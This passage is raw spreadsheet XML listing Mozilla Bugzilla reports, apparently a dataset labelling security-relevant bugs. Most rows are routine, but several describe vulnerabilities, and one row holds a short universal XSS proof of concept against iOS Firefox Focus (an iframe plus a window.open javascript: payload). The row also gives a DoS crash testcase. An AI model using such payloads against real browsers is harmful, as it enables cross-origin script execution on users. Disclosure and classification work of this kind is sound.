        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1871" t="n">
        <v>1</v>
      </c>
      <c r="U1871" t="n">
        <v>0</v>
      </c>
      <c r="V1871" t="n">
        <v>2</v>
      </c>
      <c r="W1871" t="inlineStr">
        <is>
          <t>Currently the sanitation just checks that the year matches 201[67]. We should allow for year boundaries by allowing the current year, last year, or next year (this would be correct for both Dec 31 and Jan 1).</t>
        </is>
      </c>
      <c r="X1871" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1872">
      <c r="A1872" t="n">
        <v>1579222</v>
      </c>
      <c r="B1872" t="inlineStr">
        <is>
          <t>2019-09-05 13:40:39 -0700</t>
        </is>
      </c>
      <c r="C1872" t="inlineStr">
        <is>
          <t>Fennec Crash in [@ JSAutoRealm::JSAutoRealm]</t>
        </is>
      </c>
      <c r="D1872" t="inlineStr">
        <is>
          <t>2019-09-23 06:01:10 -0700</t>
        </is>
      </c>
      <c r="E1872" t="n">
        <v>1</v>
      </c>
      <c r="F1872" t="n">
        <v>1</v>
      </c>
      <c r="G1872" t="n">
        <v>3</v>
      </c>
      <c r="H1872" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1872" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1872" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K1872" t="inlineStr">
        <is>
          <t>68 Branch</t>
        </is>
      </c>
      <c r="L1872" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1872" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1872" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1872" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1872" t="inlineStr"/>
      <c r="Q1872" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1872" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1872" t="inlineStr">
        <is>
          <t>mozilla71</t>
        </is>
      </c>
      <c r="T1872" t="n">
        <v>1</v>
      </c>
      <c r="U1872" t="n">
        <v>0</v>
      </c>
      <c r="V1872" t="n">
        <v>11</v>
      </c>
      <c r="W1872" t="inlineStr">
        <is>
          <t>It appears we have a spike in this signature in the Fennec 68.1 release: https://crash-stats.mozilla.org/signature/?signature=JSAutoRealm%3A%3AJSAutoRealm#summary. No particular trend in the URLs. APIs range from 16-28. Top crashing devices so far are two HUAWEI CLT-L29 and WAS-LX1A, followed by the Samsung Galaxy S5 mini.
Spinning this out of Bug 1535346 as requested.</t>
        </is>
      </c>
      <c r="X1872" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1873">
      <c r="A1873" t="n">
        <v>251297</v>
      </c>
      <c r="B1873" t="inlineStr">
        <is>
          <t>2004-07-13 21:47:49 -0700</t>
        </is>
      </c>
      <c r="C1873" t="inlineStr">
        <is>
          <t>files in /tmp world readable (email attachments, helper app docs)</t>
        </is>
      </c>
      <c r="D1873" t="inlineStr">
        <is>
          <t>2016-06-22 12:16:36 -0700</t>
        </is>
      </c>
      <c r="E1873" t="n">
        <v>1</v>
      </c>
      <c r="F1873" t="n">
        <v>1</v>
      </c>
      <c r="G1873" t="n">
        <v>6</v>
      </c>
      <c r="H1873" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1873" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1873" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K1873" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1873" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1873" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1873" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1873" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1873" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q1873" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1873" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1873" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1873" t="n">
        <v>1</v>
      </c>
      <c r="U1873" t="n">
        <v>0</v>
      </c>
      <c r="V1873" t="n">
        <v>23</v>
      </c>
      <c r="W1873" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1
Build Identifier: Thunderbird 0.7.1
I was comparing treatment of attachments opened directly from emails on
different platforms. I discovered that Linux builds save attachments in /tmp
with world readable rights. This doesn't seem like a good thing. Couldn't
someone else logged onto the same machine read your attachments? It seems like
the user profile is a better place for an attachment cache. Or at the very least
the files could be saved with more restrictive permissions.
Sorry if there's something I'm missing and this bug report is invalid.
Reproducible: Always
Steps to Reproduce:
1. Find an email with an attachment
2. Open the attachment from within the email by double clicking on it
Actual Results:  
The attachment was saved to /tmp with world readable rights
Expected Results:  
Save it in a more secure location (user profile directory) and/or with more
secure rights (only owner readable).</t>
        </is>
      </c>
      <c r="X1873" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1874">
      <c r="A1874" t="n">
        <v>1011007</v>
      </c>
      <c r="B1874" t="inlineStr">
        <is>
          <t>2014-05-15 08:03:12 -0700</t>
        </is>
      </c>
      <c r="C1874" t="inlineStr">
        <is>
          <t>MTypedArrayLength shouldn't assume the typed array length is immutable</t>
        </is>
      </c>
      <c r="D1874" t="inlineStr">
        <is>
          <t>2015-08-30 12:12:35 -0700</t>
        </is>
      </c>
      <c r="E1874" t="n">
        <v>1</v>
      </c>
      <c r="F1874" t="n">
        <v>1</v>
      </c>
      <c r="G1874" t="n">
        <v>3</v>
      </c>
      <c r="H1874" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1874" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1874" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K1874" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1874" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1874" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1874" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1874" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1874" t="inlineStr">
        <is>
          <t>[adv-main30+][adv-esr24.6+]</t>
        </is>
      </c>
      <c r="Q1874" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1874" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1874" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T1874" t="n">
        <v>1</v>
      </c>
      <c r="U1874" t="n">
        <v>0</v>
      </c>
      <c r="V1874" t="n">
        <v>28</v>
      </c>
      <c r="W1874" t="inlineStr">
        <is>
          <t>Created attachment 8423162
Testcase
Attached testcase fails in the shell:
$ ./js --ion-parallel-compile=off ~/dev/test.js
test.js:12:1 Error: Assertion failed: got 1000, expected 0
MTypedArrayLength::getAliasSet() assumes a typed array's length is immutable, so LICM hoists it out of the loop.
The bounds check can be hoisted too, but I can't get it to crash (it returns 0); probably because the ArrayBuffer data pointer always points to a chunk of memory large enough for the old length. MTypedArrayElements is safe, so changing the data pointer itself is fine as long as it's pointing to a chunk of memory that's big enough.</t>
        </is>
      </c>
      <c r="X1874" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1875">
      <c r="A1875" t="n">
        <v>1705094</v>
      </c>
      <c r="B1875" t="inlineStr">
        <is>
          <t>2021-04-14 07:39:03 -0700</t>
        </is>
      </c>
      <c r="C1875" t="inlineStr">
        <is>
          <t>QR code scanner allows opening non-HTTP URLs</t>
        </is>
      </c>
      <c r="D1875" t="inlineStr">
        <is>
          <t>2022-11-03 23:26:00 -0700</t>
        </is>
      </c>
      <c r="E1875" t="n">
        <v>1</v>
      </c>
      <c r="F1875" t="n">
        <v>1</v>
      </c>
      <c r="G1875" t="n">
        <v>2</v>
      </c>
      <c r="H1875" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1875" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J1875" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1875" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1875" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1875" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1875" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1875" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1875" t="inlineStr">
        <is>
          <t>[adv-main96+]</t>
        </is>
      </c>
      <c r="Q1875" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1875" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1875" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1875" t="n">
        <v>1</v>
      </c>
      <c r="U1875" t="n">
        <v>0</v>
      </c>
      <c r="V1875" t="n">
        <v>17</v>
      </c>
      <c r="W1875" t="inlineStr">
        <is>
          <t>As implemented right now, QR code scanner imposes no restrictions on the URL scheme. As I understand the logic under https://github.com/mozilla-mobile/fenix/blob/d702af5a536f3a0040980acbaba4b0ca40c9c06e/app/src/main/java/org/mozilla/fenix/search/SearchDialogFragment.kt#L423, the same restrictions are imposed here as on manually entered URLs. This means no `javascript:` URLs, but privileged URLs like `about:config` are allowed. These pages are considered not safe to be opened by websites due to potential vulnerabilities, but QR codes can currently open them.
There is also lack of URL normalization (see bug 1691472), so the confirmation message displayed cannot be considered sufficient protection.</t>
        </is>
      </c>
      <c r="X1875" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1876">
      <c r="A1876" t="n">
        <v>40365</v>
      </c>
      <c r="B1876" t="inlineStr">
        <is>
          <t>2000-05-23 16:36:08 -0700</t>
        </is>
      </c>
      <c r="C1876" t="inlineStr">
        <is>
          <t>New search files from Netcenter</t>
        </is>
      </c>
      <c r="D1876" t="inlineStr">
        <is>
          <t>2008-07-31 01:19:04 -0700</t>
        </is>
      </c>
      <c r="E1876" t="n">
        <v>1</v>
      </c>
      <c r="F1876" t="n">
        <v>1</v>
      </c>
      <c r="G1876" t="n">
        <v>2</v>
      </c>
      <c r="H1876" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1876" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J1876" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K1876" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1876" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1876" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1876" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1876" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1876" t="inlineStr">
        <is>
          <t>[nsbeta2+][6/15]</t>
        </is>
      </c>
      <c r="Q1876" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1876" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1876" t="inlineStr">
        <is>
          <t>M17</t>
        </is>
      </c>
      <c r="T1876" t="n">
        <v>1</v>
      </c>
      <c r="U1876" t="n">
        <v>0</v>
      </c>
      <c r="V1876" t="n">
        <v>8</v>
      </c>
      <c r="W1876" t="inlineStr">
        <is>
          <t>We have new search files from Netcenter that need checking in.</t>
        </is>
      </c>
      <c r="X1876" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1877">
      <c r="A1877" t="n">
        <v>1855030</v>
      </c>
      <c r="B1877" t="inlineStr">
        <is>
          <t>2023-09-25 10:02:54 -0700</t>
        </is>
      </c>
      <c r="C1877" t="inlineStr">
        <is>
          <t>iOS Firefox Focus UXSS</t>
        </is>
      </c>
      <c r="D1877" t="inlineStr">
        <is>
          <t>2024-09-16 00:12:24 -0700</t>
        </is>
      </c>
      <c r="E1877" t="n">
        <v>1</v>
      </c>
      <c r="F1877" t="n">
        <v>1</v>
      </c>
      <c r="G1877" t="n">
        <v>2</v>
      </c>
      <c r="H1877" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1877" t="inlineStr">
        <is>
          <t>Focus</t>
        </is>
      </c>
      <c r="J1877" t="inlineStr">
        <is>
          <t>Security: iOS</t>
        </is>
      </c>
      <c r="K1877" t="inlineStr">
        <is>
          <t>Firefox 122</t>
        </is>
      </c>
      <c r="L1877" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1877" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1877" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1877" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1877" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q1877" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1877" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1877" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1877" t="n">
        <v>1</v>
      </c>
      <c r="U1877" t="n">
        <v>0</v>
      </c>
      <c r="V1877" t="n">
        <v>34</v>
      </c>
      <c r="W1877" t="inlineStr">
        <is>
          <t>We are able to achieve UXSS on iOS Firefox Focus with window.open().
document.write shows we are escalating to legitimate top origin site.
PoC demo
Legitimate Top Origin Site: https://qrcodescanerror.000webhost.com/UXSS.php
```HTML
&lt;iframe src="https://pwning.click/uxsstester.php"/&gt;&lt;/iframe&gt;
```
Cross-Origin Malicious Evil Site: https://pwning.click/uxsstester.php
```HTML
&lt;script&gt;
function a(){
	window.open('javascript:document.write(document.domain)', 'x');
	setTimeout(function(){
		window.open('');
	}, 500000);
}
&lt;/script&gt; 
&lt;center&gt;&lt;input type="button" class="button" value="Trigger UXSS!" onclick="a()"&gt;&lt;/center&gt;
```</t>
        </is>
      </c>
      <c r="X1877" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1878">
      <c r="A1878" t="n">
        <v>1746448</v>
      </c>
      <c r="B1878" t="inlineStr">
        <is>
          <t>2021-12-16 08:46:10 -0800</t>
        </is>
      </c>
      <c r="C1878" t="inlineStr">
        <is>
          <t>Reuse popup window using same windowName able to overlap fullscreen notification</t>
        </is>
      </c>
      <c r="D1878" t="inlineStr">
        <is>
          <t>2024-05-30 10:52:19 -0700</t>
        </is>
      </c>
      <c r="E1878" t="n">
        <v>1</v>
      </c>
      <c r="F1878" t="n">
        <v>1</v>
      </c>
      <c r="G1878" t="n">
        <v>3</v>
      </c>
      <c r="H1878" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1878" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1878" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1878" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1878" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1878" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1878" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1878" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1878" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][adv-main100+][adv-esr91.9+]</t>
        </is>
      </c>
      <c r="Q1878" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1878" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1878" t="inlineStr">
        <is>
          <t>101 Branch</t>
        </is>
      </c>
      <c r="T1878" t="n">
        <v>1</v>
      </c>
      <c r="U1878" t="n">
        <v>0</v>
      </c>
      <c r="V1878" t="n">
        <v>20</v>
      </c>
      <c r="W1878" t="inlineStr">
        <is>
          <t>Created attachment 9255739
reusepopup.html
After launching a popup  in the same `windowName` Firefox will reuse the same popup window instead of launching a new one. Interestingly when combining this method with `requestFullscreen` the reused popup window able to show in top of the fullscreen notification.
Mozregression show it is regression of [Bug 1712038 - Exit fullscreen only when the focus change will raise the window](https://bugzilla.mozilla.org/show_bug.cgi?id=1712038). On the good build Firefox will exit the fullscreen with following console.warn `Exited fullscreen because a window was focused.`
## Steps to reproduce:
1. Visit attached reusepopup.html
2. Click "Launch Popup"
3. Click "Reuse Popup Spoof"
4. Fullscreen notification will be overlapped with reused popup window</t>
        </is>
      </c>
      <c r="X1878" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1879">
      <c r="A1879" t="n">
        <v>448564</v>
      </c>
      <c r="B1879" t="inlineStr">
        <is>
          <t>2008-07-30 11:50:30 -0700</t>
        </is>
      </c>
      <c r="C1879" t="inlineStr">
        <is>
          <t>Radware DoS report [@ nsSubDocumentFrame::Reflow]</t>
        </is>
      </c>
      <c r="D1879" t="inlineStr">
        <is>
          <t>2010-09-17 17:58:53 -0700</t>
        </is>
      </c>
      <c r="E1879" t="n">
        <v>1</v>
      </c>
      <c r="F1879" t="n">
        <v>1</v>
      </c>
      <c r="G1879" t="n">
        <v>3</v>
      </c>
      <c r="H1879" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1879" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1879" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1879" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1879" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1879" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N1879" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1879" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1879" t="inlineStr">
        <is>
          <t>[sg:dos]</t>
        </is>
      </c>
      <c r="Q1879" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1879" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1879" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1879" t="n">
        <v>1</v>
      </c>
      <c r="U1879" t="n">
        <v>0</v>
      </c>
      <c r="V1879" t="n">
        <v>72</v>
      </c>
      <c r="W1879" t="inlineStr">
        <is>
          <t>Created attachment 331760
radware testcase
Radware reported a DoS crash on the attached testcase
&lt;s&gt;
&lt;form&gt;a&lt;/form&gt;
&lt;iframe&gt;&lt;/iframe&gt;
&lt;script src=a&gt;&lt;/script&gt;
&lt;form&gt;&lt;/form&gt;
&lt;table&gt;
&lt;optgroup&gt;
I have not been able to reproduce the crash on Mac or Windows with a 3.0.1 or thereabouts build (nor could jst in 3.0), but the reported stack is a null dereference:
Unhandled exception at 0x606fe7b1 (xul.dll) in firefox.exe: 0xC0000005: Access violation reading location 0x00000004.
&gt;          xul.dll!nsSubDocumentFrame::Reflow(nsPresContext * aPresContext=0x00b9dae0, nsHTMLReflowMetrics &amp; aDesiredSize={...}, const nsHTMLReflowState &amp; aReflowState={...}, unsigned int &amp; aStatus=0x00000000)  Line 507 + 0xb bytes            C++
            xul.dll!nsLineLayout::ReflowFrame(nsIFrame * aFrame=0x0258d8b8, unsigned int &amp; aReflowStatus=0x00000000, nsHTMLReflowMetrics * aMetrics=0x00000000, int &amp; aPushedFrame=0x00000000)  Line 857          C++
            xul.dll!nsInlineFrame::ReflowInlineFrame(nsPresContext * aPresContext=0x00b9dae0, const nsHTMLReflowState &amp; aReflowState={...}, nsInlineFrame::InlineReflowState &amp; irs={...}, nsIFrame * aFrame=0x00000000, unsigned int &amp; aStatus=0x00000000)  Line 611  C++
            xul.dll!nsInlineFrame::ReflowFrames(nsPresContext * aPresContext=0x00b9dae0, const nsHTMLReflowState &amp; aReflowState={...}, nsInlineFrame::InlineReflowState &amp; irs={...}, nsHTMLReflowMetrics &amp; aMetrics={...}, unsigned int &amp; aStatus=0x00000000)  Line 479  C++
            xul.dll!nsInlineFrame::Reflow(nsPresContext * aPresContext=0x00b9dae0, nsHTMLReflowMetrics &amp; aMetrics={...}, const nsHTMLReflowState &amp; aReflowState={...}, unsigned int &amp; aStatus=0x00000000)  Line 399   C++
            xul.dll!nsLineLayout::ReflowFrame(nsIFrame * aFrame=0x0258d848, unsigned int &amp; aReflowStatus=0x00000000, nsHTMLReflowMetrics * aMetrics=0x00000000, int &amp; aPushedFrame=0x00000000)  Line 857          C++
            xul.dll!nsBlockFrame::ReflowInlineFrame(nsBlockReflowState &amp; aState={...}, nsLineLayout &amp; aLineLayout={...}, nsLineList_iterator aLine={...}, nsIFrame * aFrame=0x0258d848, LineReflowStatus * aLineReflowStatus=0x0012e29c)  Line 3608            C++
            xul.dll!nsBlockFrame::DoReflowInlineFrames(nsBlockReflowState &amp; aState={...}, nsLineLayout &amp; aLineLayout={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012e4c4, LineReflowStatus * aLineReflowStatus=0x0012e388, int aAllowPullUp=0x00000001)  Line 3430     C++
            xul.dll!nsBlockFrame::ReflowInlineFrames(nsBlockReflowState &amp; aState={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012e4c4)  Line 3279        C++
            xul.dll!nsBlockFrame::ReflowLine(nsBlockReflowState &amp; aState={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012e4c4)  Line 2335 + 0x17 bytes            C++
            xul.dll!nsBlockFrame::ReflowDirtyLines(nsBlockReflowState &amp; aState={...})  Line 1898        C++
            xul.dll!nsBlockFrame::Reflow(nsPresContext * aPresContext=0x00b9dae0, nsHTMLReflowMetrics &amp; aMetrics={...}, const nsHTMLReflowState &amp; aReflowState={...}, unsigned int &amp; aStatus=0x00000000)  Line 938   C++
            xul.dll!nsBlockReflowContext::ReflowBlock(const nsRect &amp; aSpace={...}, int aApplyTopMargin=0x00000001, nsCollapsingMargin &amp; aPrevMargin={...}, int aClearance=0x00000000, int aIsAdjacentWithTop=0x00000000, nsMargin &amp; aComputedOffsets={...}, nsLineBox * aLine=0x0258db50, nsHTMLReflowState &amp; aFrameRS={...}, unsigned int &amp; aFrameReflowStatus=0x00000000, nsBlockReflowState &amp; aState={...})  Line 339 + 0x24 bytes        C++
            xul.dll!nsBlockFrame::ReflowBlockFrame(nsBlockReflowState &amp; aState={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012eb64)  Line 3023        C++
            xul.dll!nsBlockFrame::ReflowLine(nsBlockReflowState &amp; aState={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012eb64)  Line 2282 + 0xf bytes   C++
            xul.dll!nsBlockFrame::ReflowDirtyLines(nsBlockReflowState &amp; aState={...})  Line 1898        C++
            xul.dll!nsBlockFrame::Reflow(nsPresContext * aPresContext=0x00b9dae0, nsHTMLReflowMetrics &amp; aMetrics={...}, const nsHTMLReflowState &amp; aReflowState={...}, unsigned int &amp; aStatus=0x00000000)  Line 938   C++
            xul.dll!nsBlockReflowContext::ReflowBlock(const nsRect &amp; aSpace={...}, int aApplyTopMargin=0x00000001, nsCollapsingMargin &amp; aPrevMargin={...}, int aClearance=0x00000000, int aIsAdjacentWithTop=0x00000001, nsMargin &amp; aComputedOffsets={...}, nsLineBox * aLine=0x022a358c, nsHTMLReflowState &amp; aFrameRS={...}, unsigned int &amp; aFrameReflowStatus=0x00000000, nsBlockReflowState &amp; aState={...})  Line 339 + 0x24 bytes        C++
            xul.dll!nsBlockFrame::ReflowBlockFrame(nsBlockReflowState &amp; aState={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012f204)  Line 3023         C++
            xul.dll!nsBlockFrame::ReflowLine(nsBlockReflowState &amp; aState={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012f204)  Line 2282 + 0xf bytes    C++
            xul.dll!nsBlockFrame::ReflowDirtyLines(nsBlockReflowState &amp; aState={...})  Line 1898        C++
            xul.dll!nsBlockFrame::Reflow(nsPresContext * aPresContext=0x00b9dae0, nsHTMLReflowMetrics &amp; aMetrics={...}, const nsHTMLReflowState &amp; aReflowState={...}, unsigned int &amp; aStatus=0x00000000)  Line 938   C++
            xul.dll!nsContainerFrame::ReflowChild(nsIFrame * aKidFrame=0x00000000, nsPresContext * aPresContext=0x00b9dae0, nsHTMLReflowMetrics &amp; aDesiredSize={...}, const nsHTMLReflowState &amp; aReflowState={...}, int aX=0x00000000, int aY=0x00000000, unsigned int aFlags=0x00000000, unsigned int &amp; aStatus=, nsOverflowContinuationTracker * aTracker=0x00000000)  Line 755 + 0x13 bytes     C++
            xul.dll!CanvasFrame::Reflow(nsPresContext * aPresContext=0x00b9dae0, nsHTMLReflowMetrics &amp; aDesiredSize={...}, const nsHTMLReflowState &amp; aReflowState={...}, unsigned int &amp; aStatus=0x00000000)  Line 589      C++
            xul.dll!nsContainerFrame::ReflowChild(nsIFrame * aKidFrame=0x00000000, nsPresContext * aPresContext=0x00b9dae0, nsHTMLReflowMetrics &amp; aDesiredSize={...}, const nsHTMLReflowState &amp; aReflowState={...}, int aX=0x00000000, int aY=0x00000000, unsigned int aFlags=0x00000003, unsigned int &amp; aStatus=, nsOverflowContinuationTracker * aTracker=0x00000000)  Line 755 + 0x13 bytes     C++
            xul.dll!nsHTMLScrollFrame::ReflowScrolledFrame(ScrollReflowState * aState=0x0012f808, int aAssumeHScroll=0x00000000, int aAssumeVScroll=0x00000000, nsHTMLReflowMetrics * aMetrics=0x0012f720, int aFirstPass=0x0012f7b8)  Line 493           C++
            xul.dll!nsHTMLScrollFrame::ReflowContents(ScrollReflowState * aState=0x0012f808, const nsHTMLReflowMetrics &amp; aDesiredSize={...})  Line 570       C++
            xul.dll!nsHTMLScrollFrame::Reflow(nsPresContext * aPresContext=0x00b9dae0, nsHTMLReflowMetrics &amp; aDesiredSize={...}, const nsHTMLReflowState &amp; aReflowState={...}, unsigned int &amp; aStatus=0x00000000)  Line 771  C++
            xul.dll!nsContainerFrame::ReflowChild(nsIFrame * aKidFrame=0x00000000, nsPresContext * aPresContext=0x00b9dae0, nsHTMLReflowMetrics &amp; aDesiredSize={...}, const nsHTMLReflowState &amp; aReflowState={...}, int aX=0x00000000, int aY=0x00000000, unsigned int aFlags=0x00000000, unsigned int &amp; aStatus=, nsOverflowContinuationTracker * aTracker=0x00000000)  Line 755 + 0x13 bytes     C++
            xul.dll!ViewportFrame::Reflow(nsPresContext * aPresContext=0x00b9dae0, nsHTMLReflowMetrics &amp; aDesiredSize={...}, const nsHTMLReflowState &amp; aReflowState={...}, unsigned int &amp; aStatus=0x00000000)  Line 288      C++
            xul.dll!PresShell::DoReflow(nsIFrame * target=0x00000000)  Line 6215       C++
            xul.dll!PresShell::ProcessReflowCommands(int aInterruptible=0x00000001)  Line 6307        C++
            xul.dll!PresShell::DoFlushPendingNotifications(mozFlushType aType=Flush_Layout, int aInterruptibleReflow=0x00000001)  Line 4513        C++
            xul.dll!PresShell::ReflowEvent::Run()  Line 6067  
            xul.dll!nsThread::ProcessNextEvent(int mayWait=0x00000001, int * result=0x0012fc68)  Line 511    C++
            xul.dll!NS_ProcessNextEvent_P(nsIThread * thread=0x00000000, int mayWait=0x0012ff14)  Line 227 + 0xc bytes     C++
            xul.dll!nsBaseAppShell::Run()  Line 153   C++
            xul.dll!nsAppStartup::Run()  Line 182       C++
            xul.dll!XRE_main(int argc=0x00000001, char * * argv=0x00349bc8, const nsXREAppData * aAppData=0x00349f60)  Line 3137     C++
            firefox.exe!NS_internal_main(int argc=0x00000001)  Line 159  C++
            firefox.exe!wmain(int argc=0x00000001, wchar_t * * argv=0x00347c90)  Line 55 + 0x8 bytes            C++
            firefox.exe!__tmainCRTStartup()  Line 594 + 0x17 bytes    C
            kernel32.dll!_BaseProcessStart@4()  + 0x23 bytes           
Source nsframeframe.cpp, line 507:
  mInnerView is 0x00;
  nsIViewManager* vm = mInnerView-&gt;GetViewManager();</t>
        </is>
      </c>
      <c r="X1879" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1880">
      <c r="A1880" t="n">
        <v>745158</v>
      </c>
      <c r="B1880" t="inlineStr">
        <is>
          <t>2012-04-13 04:41:05 -0700</t>
        </is>
      </c>
      <c r="C1880" t="inlineStr">
        <is>
          <t>Crash [@ Decompile] with let expressions</t>
        </is>
      </c>
      <c r="D1880" t="inlineStr">
        <is>
          <t>2014-02-26 11:51:58 -0800</t>
        </is>
      </c>
      <c r="E1880" t="n">
        <v>1</v>
      </c>
      <c r="F1880" t="n">
